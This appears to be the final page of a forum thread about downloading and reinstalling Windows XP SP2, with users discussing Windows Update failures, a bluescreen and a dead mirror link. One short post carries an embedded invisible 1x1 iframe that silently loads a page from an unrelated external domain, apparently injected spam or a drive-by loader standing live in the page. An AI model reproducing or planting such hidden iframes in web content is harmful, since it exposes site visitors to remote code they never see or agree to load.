Please report all spam threads, posts and suspicious members. We receive spam notifications and will take immediate action!
Page 5 of 5 FirstFirst ... 345

Thread: Windows XP SP2 - Download it here

Talking Re: Windows XP SP2 - Download it here

I just upgraded my motherboard and reintalled my existing windows xp via the repair function plus phoning in at Microsoft for a new activation code. Everything worked fine and my two harddrives run okay with all the stuff I have on it. However, when I tried to update windows I could not connect. I am also told by windows that I already have SP2 (I did have it) and it seems to work on the IE (blocking stuff, etc).

Sites explaining how to upgrade a motherboard but keeping your existing windows say to go through the process I decribed above but they also explain that one needs to reinstall SP1 and SP2. I then downloaded SP1a (for windows xp) and installed it (not sure whether it was still there from before I upgraded) but still not able to connect to windows update (the screen simply freezes and I have to use Alt Ctrl Del to close it down.

I now download SP2 from one the mirror links you have provided. The download is extremly slow:
    • Do you know why that is?
    • Is it the original pack?
    • should I install it - although it might still be there?
    • will this enable me to connect with windows update
    Best,
    Alles hat ein Ende nur die Wurst hat zwei

Default Re: Windows XP SP2 - Download it here

This thread was started almost a year ago. I'm sure that the installation pack has been updated. You say that you can't connect to Windows Update... can you connect to Microsoft's homepage? If so, then hit up their download section and you can get the full version of SP2.
    Old age and treachery will overcome youth and skill
    My Toys

I get bluescreen on watchdog.sys when I upgrade to XP SP2. :-/

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>

Well, uhmm ... hi.

Could that damn.be link in the first post be removed? It's no longer available, and I keep getting requests for it :)

Done... sorry for the inconvenience.
    Old age and treachery will overcome youth and skill
    My Toys

Page 5 of 5 FirstFirst ... 345

Thread Information